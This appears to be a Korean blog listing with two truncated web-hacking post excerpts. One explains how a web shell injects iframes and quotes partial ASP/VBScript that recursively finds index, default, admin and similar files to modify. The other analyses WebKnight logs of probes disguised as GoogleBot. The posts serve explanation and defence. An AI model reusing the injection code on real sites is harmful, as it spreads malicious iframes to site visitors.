webhacking

웹쉘을 이용한 iframe 코드를 추가원리

다음 구문은 Scripting.FileSystemObject 를 이용해서 하위폴더를 포함한 특정 디렉토리내의 특정패턴을 가진 파일명을 가진 파일을 기준으로 특정코드를 추가하는 스크립트 입니다. Set fs=Server.createObject("Scripting.FileSystemObject") Set fd=fs.GetFolder(s) Set fi=fd.Files Set sf=fd.SubFolders For Each f in fi rtn=f.path step_all rtn Next If sf.Count0 Then For Each l In sf sch l Next End If Sub step_all(agr) retVal=IsPattern("(\\|\/)(default|index|conn|admin|bbs|r..

[해킹] GoogleBot 으로 위장한 웹해킹 시도

웹나이트 로그를 분석하다 보면 여러가지 정보를 수집하려는 하기도 하고, 흥미로운(?) 웹해킹로그를 발견하게도 됩니다. 시스템정보를 알아보기 위해 사용하는 프로그램은 여러가지가 있습니다. 사용자가 직접 만든 프로그램일수도 있으며, nmap 과 같이 무료로 배포되어서 사용되는 프로그램도 있습니다 하지만 대걔 특정 프로그램을 이용해서만 해킹시도를 하는 경우를 많습니다. 즉 사용자 에이젼트가 어떤것인지만 안다면 어느정도 차단을 할수 있는 웹해킹시도가 많다는 것입니다. 저는 다음과 같은 Webknight 로그를 매일 리포팅 받고 있습니다. 다음은 Webknight 로그를 파싱한 화면으로 특이한 부분이 발견되었습니다. 처음 구문부터 분석을 해보도록 하겠습니다. 13:03:20 ; W3SVC440 ; OnUrlMap..